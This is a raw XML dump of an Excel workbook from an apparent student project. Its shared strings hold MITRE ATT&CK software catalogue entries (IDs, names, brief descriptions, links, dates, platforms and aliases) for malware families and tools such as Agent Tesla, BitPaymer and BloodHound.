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509"/>
  <workbookPr defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/elisabethgoebel/Documents/Studium/Teamprojekt/attack-hypotheses-generation/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A43CD24B-E626-9042-99DC-0C0DB2A5AAD4}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="28800" windowHeight="18000" activeTab="5" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Software" sheetId="1" r:id="rId1"/>
    <sheet name="Techniques" sheetId="2" r:id="rId2"/>
    <sheet name="Association" sheetId="3" r:id="rId3"/>
    <sheet name="Association_compact" sheetId="4" r:id="rId4"/>
    <sheet name="Vektordarstellung" sheetId="5" r:id="rId5"/>
    <sheet name="Datamatrix with timestemp and r" sheetId="6" r:id="rId6"/>
  </sheets>
  <calcPr calcId="0"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="71369" uniqueCount="11603">
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>created</t>
  </si>
  <si>
    <t>last modified</t>
  </si>
  <si>
    <t>version</t>
  </si>
  <si>
    <t>platforms</t>
  </si>
  <si>
    <t>aliases</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>contributors</t>
  </si>
  <si>
    <t>S0066</t>
  </si>
  <si>
    <t>3PARA RAT</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024). (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0066</t>
  </si>
  <si>
    <t>31 May 2017</t>
  </si>
  <si>
    <t>30 March 2020</t>
  </si>
  <si>
    <t>1.1</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>malware</t>
  </si>
  <si>
    <t>S0065</t>
  </si>
  <si>
    <t>4H RAT</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0065</t>
  </si>
  <si>
    <t>S0469</t>
  </si>
  <si>
    <t>ABK</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0469</t>
  </si>
  <si>
    <t>10 June 2020</t>
  </si>
  <si>
    <t>24 June 2020</t>
  </si>
  <si>
    <t>1.0</t>
  </si>
  <si>
    <t>S0045</t>
  </si>
  <si>
    <t>ADVSTORESHELL</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0045</t>
  </si>
  <si>
    <t>AZZY, EVILTOSS, NETUI, Sedreco</t>
  </si>
  <si>
    <t>S0073</t>
  </si>
  <si>
    <t>ASPXSpy</t>
  </si>
  <si>
    <t>[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. It has been modified by [Threat Group-3390](https://attack.mitre.org/groups/G0027) actors to create the ASPXTool version. (Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0073</t>
  </si>
  <si>
    <t>ASPXTool</t>
  </si>
  <si>
    <t>S0552</t>
  </si>
  <si>
    <t>AdFind</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0552</t>
  </si>
  <si>
    <t>28 December 2020</t>
  </si>
  <si>
    <t>29 December 2020</t>
  </si>
  <si>
    <t>tool</t>
  </si>
  <si>
    <t>S0331</t>
  </si>
  <si>
    <t>Agent Tesla</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.(Citation: Fortinet Agent Tesla April 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0331</t>
  </si>
  <si>
    <t>29 January 2019</t>
  </si>
  <si>
    <t>21 April 2021</t>
  </si>
  <si>
    <t>1.2</t>
  </si>
  <si>
    <t>S0092</t>
  </si>
  <si>
    <t>Agent.btz</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0092</t>
  </si>
  <si>
    <t>S0504</t>
  </si>
  <si>
    <t>Anchor</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0504</t>
  </si>
  <si>
    <t>10 September 2020</t>
  </si>
  <si>
    <t>05 October 2020</t>
  </si>
  <si>
    <t>Linux, Windows</t>
  </si>
  <si>
    <t>Anchor_DNS</t>
  </si>
  <si>
    <t>Cybereason Nocturnus, @nocturnus</t>
  </si>
  <si>
    <t>S0584</t>
  </si>
  <si>
    <t>AppleJeus</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://attack.mitre.org/software/S0584) has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://attack.mitre.org/software/S0584) has been used to distribute the [FALLCHILL](https://attack.mitre.org/software/S0181) RAT.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0584</t>
  </si>
  <si>
    <t>01 March 2021</t>
  </si>
  <si>
    <t>27 April 2021</t>
  </si>
  <si>
    <t>Windows, macOS</t>
  </si>
  <si>
    <t>S0456</t>
  </si>
  <si>
    <t>Aria-body</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019).(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0456</t>
  </si>
  <si>
    <t>26 May 2020</t>
  </si>
  <si>
    <t>03 July 2020</t>
  </si>
  <si>
    <t>S0099</t>
  </si>
  <si>
    <t>Arp</t>
  </si>
  <si>
    <t>[Arp](https://attack.mitre.org/software/S0099) displays information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0099</t>
  </si>
  <si>
    <t>17 October 2018</t>
  </si>
  <si>
    <t>Linux, Windows, macOS</t>
  </si>
  <si>
    <t>arp.exe</t>
  </si>
  <si>
    <t>S0373</t>
  </si>
  <si>
    <t>Astaroth</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. (Citation: Cybereason Astaroth Feb 2019)(Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0373</t>
  </si>
  <si>
    <t>17 April 2019</t>
  </si>
  <si>
    <t>08 December 2020</t>
  </si>
  <si>
    <t>2.0</t>
  </si>
  <si>
    <t>Guildma</t>
  </si>
  <si>
    <t>Carlos Borges, @huntingneo, CIP</t>
  </si>
  <si>
    <t>S0438</t>
  </si>
  <si>
    <t>Attor</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://attack.mitre.org/software/S0438) has a loadable plugin architecture to customize functionality for specific targets.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0438</t>
  </si>
  <si>
    <t>06 May 2020</t>
  </si>
  <si>
    <t>07 July 2020</t>
  </si>
  <si>
    <t>ESET</t>
  </si>
  <si>
    <t>S0347</t>
  </si>
  <si>
    <t>AuditCred</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0347</t>
  </si>
  <si>
    <t>30 January 2019</t>
  </si>
  <si>
    <t>Roptimizer</t>
  </si>
  <si>
    <t>S0129</t>
  </si>
  <si>
    <t>AutoIt backdoor</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0129</t>
  </si>
  <si>
    <t>S0473</t>
  </si>
  <si>
    <t>Avenger</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0473</t>
  </si>
  <si>
    <t>11 June 2020</t>
  </si>
  <si>
    <t>S0344</t>
  </si>
  <si>
    <t>Azorult</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016.
In July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0344</t>
  </si>
  <si>
    <t>S0031</t>
  </si>
  <si>
    <t>BACKSPACE</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is a backdoor used by [APT30](https://attack.mitre.org/groups/G0013) that dates back to at least 2005. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0031</t>
  </si>
  <si>
    <t>Lecna</t>
  </si>
  <si>
    <t>S0245</t>
  </si>
  <si>
    <t>BADCALL</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by the group [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0245</t>
  </si>
  <si>
    <t>S0128</t>
  </si>
  <si>
    <t>BADNEWS</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0128</t>
  </si>
  <si>
    <t>21 October 2020</t>
  </si>
  <si>
    <t>S0470</t>
  </si>
  <si>
    <t>BBK</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0470</t>
  </si>
  <si>
    <t>S0127</t>
  </si>
  <si>
    <t>BBSRAT</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) is malware with remote access tool functionality that has been used in targeted compromises. (Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0127</t>
  </si>
  <si>
    <t>S0017</t>
  </si>
  <si>
    <t>BISCUIT</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) is a backdoor that has been used by [APT1](https://attack.mitre.org/groups/G0006) since as early as 2007. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0017</t>
  </si>
  <si>
    <t>S0190</t>
  </si>
  <si>
    <t>BITSAdmin</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0190</t>
  </si>
  <si>
    <t>18 April 2018</t>
  </si>
  <si>
    <t>20 March 2020</t>
  </si>
  <si>
    <t>Edward Millington</t>
  </si>
  <si>
    <t>S0069</t>
  </si>
  <si>
    <t>BLACKCOFFEE</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) is malware that has been used by several Chinese groups since at least 2013. (Citation: FireEye APT17) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0069</t>
  </si>
  <si>
    <t>S0520</t>
  </si>
  <si>
    <t>BLINDINGCAN</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0520</t>
  </si>
  <si>
    <t>27 October 2020</t>
  </si>
  <si>
    <t>17 March 2021</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security</t>
  </si>
  <si>
    <t>S0360</t>
  </si>
  <si>
    <t>BONDUPDATER</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0360</t>
  </si>
  <si>
    <t>18 February 2019</t>
  </si>
  <si>
    <t>09 February 2021</t>
  </si>
  <si>
    <t>S0415</t>
  </si>
  <si>
    <t>BOOSTWRITE</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) is a loader crafted to be launched via abuse of the DLL search order of applications used by [FIN7](https://attack.mitre.org/groups/G0046).(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0415</t>
  </si>
  <si>
    <t>11 October 2019</t>
  </si>
  <si>
    <t>15 October 2019</t>
  </si>
  <si>
    <t>S0114</t>
  </si>
  <si>
    <t>BOOTRASH</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that targets Windows operating systems. It has been used by threat actors that target the financial sector.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0114</t>
  </si>
  <si>
    <t>Christopher Glyer, FireEye, @cglyer</t>
  </si>
  <si>
    <t>S0014</t>
  </si>
  <si>
    <t>BS2005</t>
  </si>
  <si>
    <t>[BS2005](https://attack.mitre.org/software/S0014) is malware that was used by [Ke3chang](https://attack.mitre.org/groups/G0004) in spearphishing campaigns since at least 2011. (Citation: Villeneuve et al 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0014</t>
  </si>
  <si>
    <t>S0043</t>
  </si>
  <si>
    <t>BUBBLEWRAP</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0043</t>
  </si>
  <si>
    <t>Backdoor.APT.FakeWinHTTPHelper</t>
  </si>
  <si>
    <t>S0414</t>
  </si>
  <si>
    <t>BabyShark</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. (Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0414</t>
  </si>
  <si>
    <t>07 October 2019</t>
  </si>
  <si>
    <t>12 March 2021</t>
  </si>
  <si>
    <t>S0475</t>
  </si>
  <si>
    <t>BackConfig</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) is a custom Trojan with a flexible plugin architecture that has been used by [Patchwork](https://attack.mitre.org/groups/G0040).(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0475</t>
  </si>
  <si>
    <t>17 June 2020</t>
  </si>
  <si>
    <t>29 June 2020</t>
  </si>
  <si>
    <t>S0093</t>
  </si>
  <si>
    <t>Backdoor.Oldrea</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0093</t>
  </si>
  <si>
    <t>Havex</t>
  </si>
  <si>
    <t>S0337</t>
  </si>
  <si>
    <t>BadPatch</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0337</t>
  </si>
  <si>
    <t>17 March 2020</t>
  </si>
  <si>
    <t>S0234</t>
  </si>
  <si>
    <t>Bandook</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi, which has been available since roughly 2007  (Citation: EFF Manul Aug 2016) (Citation: Lookout Dark Caracal Jan 2018).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0234</t>
  </si>
  <si>
    <t>S0239</t>
  </si>
  <si>
    <t>Bankshot</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0239</t>
  </si>
  <si>
    <t>Trojan Manuscript</t>
  </si>
  <si>
    <t>S0534</t>
  </si>
  <si>
    <t>Bazar</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor malware in use since at least April 2020, with infections mainly targeting professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) has been reported to have ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0534</t>
  </si>
  <si>
    <t>18 November 2020</t>
  </si>
  <si>
    <t>16 April 2021</t>
  </si>
  <si>
    <t>KEGTAP, Team9</t>
  </si>
  <si>
    <t>S0574</t>
  </si>
  <si>
    <t>BendyBear</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://attack.mitre.org/software/S0574) shares a variety of features with [Waterbear](https://attack.mitre.org/software/S0579), malware previously attributed to the Chinese cyber espionage group [BlackTech](https://attack.mitre.org/groups/G0098).(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0574</t>
  </si>
  <si>
    <t>16 February 2021</t>
  </si>
  <si>
    <t>S0268</t>
  </si>
  <si>
    <t>Bisonal</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014. (Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0268</t>
  </si>
  <si>
    <t>S0570</t>
  </si>
  <si>
    <t>BitPaymer</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://attack.mitre.org/software/S0570) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://attack.mitre.org/software/S0570) has several indicators suggesting overlap with the [Dridex](https://attack.mitre.org/software/S0384) malware and is often delivered via [Dridex](https://attack.mitre.org/software/S0384).(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0570</t>
  </si>
  <si>
    <t>08 February 2021</t>
  </si>
  <si>
    <t>26 April 2021</t>
  </si>
  <si>
    <t>FriedEx, wp_encrypt</t>
  </si>
  <si>
    <t>S0089</t>
  </si>
  <si>
    <t>BlackEnergy</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0089</t>
  </si>
  <si>
    <t>1.3</t>
  </si>
  <si>
    <t>Black Energy</t>
  </si>
  <si>
    <t>S0564</t>
  </si>
  <si>
    <t>BlackMould</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) is a web shell based on [China Chopper](https://attack.mitre.org/software/S0020) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://attack.mitre.org/groups/G0093) against telecommunication providers.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0564</t>
  </si>
  <si>
    <t>14 January 2021</t>
  </si>
  <si>
    <t>23 March 2021</t>
  </si>
  <si>
    <t>S0521</t>
  </si>
  <si>
    <t>BloodHound</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0521</t>
  </si>
  <si>
    <t>28 October 2020</t>
  </si>
  <si>
    <t>24 November 2020</t>
  </si>
  <si>
    <t>S0486</t>
  </si>
  <si>
    <t>Bonadan</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://attack.mitre.org/software/S0486) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0486</t>
  </si>
  <si>
    <t>16 July 2020</t>
  </si>
  <si>
    <t>10 August 2020</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>S0252</t>
  </si>
  <si>
    <t>Brave Prince</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0252</t>
  </si>
  <si>
    <t>21 April 2020</t>
  </si>
  <si>
    <t>S0204</t>
  </si>
  <si>
    <t>Briba</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor and download files on to compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0204</t>
  </si>
  <si>
    <t>S0482</t>
  </si>
  <si>
    <t>Bundlore</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0482</t>
  </si>
  <si>
    <t>01 July 2020</t>
  </si>
  <si>
    <t>06 July 2020</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>OSX.Bundlore</t>
  </si>
  <si>
    <t>S0025</t>
  </si>
  <si>
    <t>CALENDAR</t>
  </si>
  <si>
    <t>[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0025</t>
  </si>
  <si>
    <t>S0465</t>
  </si>
  <si>
    <t>CARROTBALL</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0465</t>
  </si>
  <si>
    <t>02 June 2020</t>
  </si>
  <si>
    <t>S0462</t>
  </si>
  <si>
    <t>CARROTBAT</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356).(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0462</t>
  </si>
  <si>
    <t>15 June 2020</t>
  </si>
  <si>
    <t>S0222</t>
  </si>
  <si>
    <t>CCBkdr</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. (Citation: Talos CCleanup 2017) (Citation: Intezer Aurora Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0222</t>
  </si>
  <si>
    <t>S0023</t>
  </si>
  <si>
    <t>CHOPSTICK</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0023</t>
  </si>
  <si>
    <t>2.1</t>
  </si>
  <si>
